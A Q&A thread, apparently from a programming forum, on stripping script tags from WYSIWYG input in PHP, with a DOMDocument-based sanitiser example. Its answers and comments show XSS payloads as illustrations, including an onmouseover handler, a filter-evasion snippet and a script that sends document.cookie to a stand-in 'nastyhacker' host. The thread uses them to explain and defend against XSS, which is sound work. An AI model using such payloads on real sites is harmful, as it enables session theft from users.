5

How to change all the occurrences of <script>, <Script>, <scRipT>, <sCrIpT> and so on to &lt;script&gt;, &lt;Script&gt; with PHP?
I also want to remove

The input will be taken from a WYSIWYG editor, so I cannot use the strip_tags function.

Edit 2
Is there any other way a user can execute JavaScript with some kind of strange characters to
I found this on the internet

<scr<!--*-->ipt>
alert('hi')
</script>

But it did not work, though. Are there any such possibilities?

3 Answers

6

Simply removing <script> tags from untrusted input is not enough to guard against XSS attacks. For example, <a href="#" onmouseover="alert('pwned!');"> – I just put script in your page—without using a <script> tag—and stole your cookies. Oops.

This is a case where you really need to use a well-tested library that actually parses the HTML and removes the stuff you don't want.


4 Comments

I can convert < to &lt;, but the problem is I'm using a WYSIWYG editor, and they use <> too for HTML tags :(
BTW I've heard of people stealing cookies using JAVASCRIPT, how is it possible :O, coz [I think] JS cannot mail you my cookie, you are only able to steal your own cookie; if I'm wrong please show me the error
@Sourav: Right, because <script> is a HTML tag just like <b> or any other. That is why you need a library like HTMLPurifier to parse your input and remove unsafe tags and attributes (like <script> blocks and event handler attributes like onmouseover, onclick, and onload).
@Sourav, re stealing cookies: If I could insert <script>document.write('<img src="//www.example.com/nastyhacker?cookie=' + encodeURIComponent(document.cookie) + '">');</script> into a page, I've successfully stolen the cookies of anyone who loads that page. (This is mitigated by the server setting a login cookie as HttpOnly, but that obviously depends on the site's configuration.)
3

Probably the simplest method would be str_ireplace() for case-insensitive replacement, however this won't preserve the case of the "sCriPt" word. But if you're out to de-fang XSS attacks that may be just fine:

str_ireplace("<script>", "&lt;script&gt;", $input);

A more complex solution could be devised with preg_replace() to preserve case, but would be slower. This might work, but if it were me I'd use str_ireplace()...

preg_replace("/<(script)>/i", "&lt;$1&gt;", $input);

Note: If it is XSS prevention you're after, neither of these takes into account things like <script type=text/javascript>. To truly handle these cases, you need to load the HTML string into DOMDocument and delete the offending script nodes.

3 Comments

@josh3736 I agree, and as in my answer I wouldn't use preg_replace, but in this instance it isn't even being used as a regex. Instead it's just a shortcut to preserve case in a simple string replacement. Anyway, disclaimer added above.
"You need to load the HTML string into DOMDocument and delete the offending script nodes": how to do that?
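Following the Note in this answer and the question in the comment above, here is an added example (not code from any of the posters) of doing the removal with DOMDocument. The tag list, attribute list and URL schemes it blocks are this example's own choices, and it assumes PHP 7+ with the DOM extension; a maintained library such as HTMLPurifier, as the first answer recommends, remains the safer choice for real input.

```php
<?php
// Added example: strip active content from a WYSIWYG HTML fragment by
// parsing it with DOMDocument instead of string/regex replacement.
function removeActiveContent(string $fragment): string
{
    // Blocklist chosen for this example; a real deployment should use an
    // allowlist-based library (e.g. HTMLPurifier) rather than this list.
    $dangerousTags = ['script', 'style', 'iframe', 'object', 'embed', 'form', 'meta', 'link', 'base'];
    $urlAttributes = ['href', 'src', 'action', 'formaction', 'xlink:href'];

    $doc = new DOMDocument();
    libxml_use_internal_errors(true); // tolerate the broken markup editors produce
    $doc->loadHTML(
        '<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head>'
        . '<body>' . $fragment . '</body></html>'
    );
    libxml_clear_errors();
    $xpath = new DOMXPath($doc);

    // 1. Remove elements that run or load code, with their children.
    //    libxml lowercases tag names, so <sCrIpT> matches //script.
    foreach ($dangerousTags as $tag) {
        foreach (iterator_to_array($xpath->query('//' . $tag)) as $node) {
            $node->parentNode->removeChild($node);
        }
    }

    // 2. Drop every on* event-handler attribute (onmouseover, onclick, ...)
    //    and any URL attribute whose scheme can execute script.
    foreach (iterator_to_array($xpath->query('//@*')) as $attr) {
        $name  = strtolower($attr->nodeName);
        // strip control chars/whitespace so "java\nscript:" is still caught
        $value = strtolower(preg_replace('/[\x00-\x20]+/', '', $attr->nodeValue));
        if (strncmp($name, 'on', 2) === 0
            || (in_array($name, $urlAttributes, true)
                && preg_match('/^(javascript|vbscript|data):/', $value))) {
            $attr->ownerElement->removeAttribute($attr->nodeName);
        }
    }

    // 3. Serialise only the children of <body>, not the wrapper document.
    $out = '';
    foreach ($doc->getElementsByTagName('body')->item(0)->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

// Constructed samples based on the inputs discussed in this thread.
$samples = [
    '<p>Hello <b>world</b></p>',                              // kept as-is
    '<a href="#" onmouseover="alert(\'pwned!\');">link</a>',  // handler attribute dropped
    '<sCrIpT type=text/javascript>alert("hi")</script>',      // element removed entirely
    '<a href="JavaScript:alert(1)">x</a>',                     // script URL dropped
];
foreach ($samples as $html) {
    echo removeActiveContent($html), PHP_EOL;
}
```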
0

Is there any reason you can't use htmlspecialchars()?

4 Comments

I just want to convert <,>,'," to save DB space
@Sourav How will that conserve space?
When I use htmlspecialchars() it will convert & to &amp;, so it stores 5 characters instead of a single one!
But if you convert < to &lt; it will be storing four characters instead of one. Either way, I highly recommend the answers above regarding XSS.
